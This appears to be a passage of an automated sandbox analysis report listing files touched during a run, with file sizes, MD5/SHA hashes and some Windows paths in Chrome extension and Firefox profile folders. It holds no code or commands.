SHA140dd4f13f2c31e534eb985f9a1e9bb42548d4d8d
SHA2568f5a1b8b54507e96a638b8263831a1839e1f690f62b8b3d3826ea5297251e388
SHA512fe3eb5a5c471bc3cec41ca647f0596db48741148cac46d1c808e64a5db95224ff8abdbd6529fb12c588e3a6d67443fefb8d3dd8c9f587728c474a319b99fe430
-
Filesize
1.7MB
MD51b850dd61dfbb0fb8782987f0b6f365c
SHA1a6d5c487ba7c8417ac4f2f6ab46a560f20ca404d
SHA256a5e020f3d85998f530607c7e83d229449befec6e9800c5ae6f9cdd76659da0ef
SHA51238da11e6e7e1c09d892cf79ee0c51a560f6caf7dc748c04200c5fb8dea3fad2b8f5d33041863bf4b9ee6e54b9dfaf57f823fd1c63c0147955952650b6e013c96
-
Filesize
945KB
MD5a0cbbfb318f3234ba27fe37209f912ec
SHA1f8ffd3d9f9f1ffe53ebc5f304e9690b3f75a7408
SHA25653b494f24583c4909633d9084b7a8875b854600a635847842285ecbcd1067dfc
SHA512e8237171ac54c47a82d83da487c69beb824017b23c61b2277f83784925fa3b74d9e23d6b2c626d4e61fc43fb3ae27502498a031994319076ef89d4155f5d8041
-
Filesize
2.6MB
MD5c70af23073a65ecade1c60277c87926c
SHA1f767ac215f7976cbc5f3a29efc5cb1445ff348d7
SHA2564f90cb22170be6c5460ab828e47b0cf2b323b1920acf1e479c49cf0ffa451363
SHA5120528c4996c2a3ac5dcfca9f4e9e7961341793683c65eb79711895376bb4165ac773136c982c3a95fa30d71ef468c796d8a51caf2d20fad050fb22dbbed7af13d
-
Filesize
1.8MB
MD5a84456172908e096d0ac6272b9503e08
SHA18b64d38bae9fc390e621323e9e91eb8f7def421c
SHA2564f95dff270ac4172d470789c3fce9ae2c656565a3887afc86507ec49981bd128
SHA5123237f19915957327d3debd46de1c52531622fba5dbb2e06c9685ca336bd4febf19c2f3dd533c5046b0e676d21f10ba10478b3bbe9dbb31823b7dc118a6413800
-
Filesize
135KB
MD53f6f93c3dccd4a91c4eb25c7f6feb1c1
SHA19b73f46adfa1f4464929b408407e73d4535c6827
SHA25619f05352cb4c6e231c1c000b6c8b7e9edcc1e8082caf46fff16b239d32aa7c9e
SHA512d488fa67e3a29d0147e9eaf2eabc74d9a255f8470cf79a4aea60e3b3b5e48a3fcbc4fc3e9ce58dff8d7d0caa8ae749295f221e1fe1ba5d20deb2d97544a12ba4
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir4136_1721141405\CRX_INSTALL\_locales\en_CA\messages.json
Filesize711B
MD5558659936250e03cc14b60ebf648aa09
SHA132f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA2562445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA5121632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727
-
Filesize
186B
MD53e1193783a94f22715b17fb78dc88b12
SHA118397af3fbc7cfb55c1b1f2e6f2608ef412c6863
SHA256bc7eda9c71d59e72fe8d719febfe85a17ae8273f1016b5f9f8e4499a5bfdd428
SHA512c045707f148e7aeb342820cbb439ad9d0ab6e085aaea5f4dec54f22f6ddf655aa872855e6cb49180344d46d079ce24260db5b097baec2014f251da5a34e8aad0
-
Filesize
114KB
MD5eb8c6139f83c330881b13ec4460d5a39
SHA1837283823a7e4e107ca7e39b1e7c3801841b1ef8
SHA256489d5195735786050c4115677c5856e3ce72c3ecf2574be55021ad3d71caf40e
SHA51288411dca362f0d9da0c093e60bf2b083340d0682b5ac91f25c78ac419cec1e325d0a5a0f96fd447d3d3806813cad7f1ca8cf9c423061327fbd16c8662f3cbddf
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\AlternateServices.bin
Filesize11KB
MD59a010a70fd89bf860debd6d7ee87d337
SHA1a7c7a1054d41356aa5c76a4c9774ea428b29a0cc
SHA256a2510dcdbad7adcd9a624d3c63f554faf2d165a76e37bb94a539b7befb5edbf0
SHA51203aa8b847a0b4c2b3e40903665c7c959f2965b43dc8ded3b251f9e96cbac4c419e26fe8c70e4ff9fdade0431e481f096ecc2a1a2e7fe16e6f656b16733b13b84
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5fec4c904275675b807ac8edb8b6f5556
SHA1853d2fe9810f8279e645ab21624825f580d1d0c3
SHA2565a0c38520b779d7be86df2fb74fb552a0e967717cdf2bcfca372b002bb96774b
SHA51280fdc5e31d4225a97e18acb2fb3b59e88c0f79a4c4bf9e55ef25358b89cf174f9863586878e2d1e34369e57710ff4952571ea3c3d747246b9d886c2c51b44051
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5d024d2ccc92bedc46fafd16ab5a5efa2
SHA1cfc58d3ca9d68720828c7557e3d45ff589657d90
SHA256edc4669b8daa86b9d8b815f2c7077cf0648449e87194b8b008e861ec581e1472
SHA512f768a2ad26d0528233ff851ea6dbf7cbe2d35d1eb2321d9b27045d71236de6de6079fb893a87d55411186e20775539e5dcc1a43b132a8034afab5dd10d135a72
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\06652ee5-6b22-443c-89e6-072106b6b4ac
Filesize982B
MD5e4bfda3e6cfea529e84fdbe74014a119
SHA18907e9c1ac30c23cd8de28f3e1ff65fbb4554d10
SHA256883987cda36fe2956feeb926812af5cdd53d2d0dc6ff665590c52db00f04c6a7
SHA512ae5aefce8839665de496b52a3717a345697bd02a0207f0954f1d3e1a347d953c133b766691e4fc0181a7901357ccc71c8458ed799429297982c0311d582fbf36
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\db026115-01ac-45fd-9465-cbaba5893dfa
Filesize28KB
MD5044f6be7d172ecc53544ff2c632a95f6
SHA10a6b393092cdaf159514e1d052ccb538d54a167d
SHA256419fe14126afb4c3d50fa06f4a9f56f05c122d0e7a3f6befdb33ab93551068a3
SHA5128a6dd54a331b2c35165cfb47a1e8948473724ebe59989207a2cb3dae1a94f55536687854f39a7adefae8b7b1aa9221fc8b39011be4a8baf515c4d3cbe1b750ee
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\dd1366f2-3f33-4666-8f6f-adfbe1835853
Filesize671B
MD573c9d756e7188532eead1c5ea83430b9
SHA11917b016c7a1064c7d9656f6fbe26247e67eafa2
SHA25646f6e2f03ee3dd4b772cba3b2cd8de65b7f29d4ed3486d832066e29468bf9eb3
SHA512151464827ad6129f892e5afd88dc1f9a0c220d38e7ef7ecf495541aebd5ff965068e2ec5490ca0132c29084005c8f1800415cafee35a355671f613416fd41a53
-
Filesize
10KB
MD52a334eb34de3a3cbdb0f2c97f6550b76
SHA17971501679bd1bc37c44923075898e93ba8adba4
SHA256ac52b9fac67216b9897f6439cc8954c080b5d7c10e098e9201597193c2ca9356
SHA5120b718279629c6f01c297c5b24d42a5ca9491eba223109c4a755ac1598e971893040aa78315563270b8ce5b1c20c11c215eb5103de262799031e526fef00baf16
-
Filesize
3.1MB
MD5d4e576f2c6e03c5d117371252ce42a51
SHA15e7da31fb84515315064592102aabc605e735912
SHA256b4ec4fa9a82bcf05881623ad9375ecb5148aa9cd3309edd6fa14a4ca75580b6d
SHA5128e8302591b52e33b574178ec8a210a66b96c825e3e070460a624ff007d8c9f0770fbac4ba3c12de4a5c83f80fa56970aed5f3dca78a9e169c688edb3610c0e19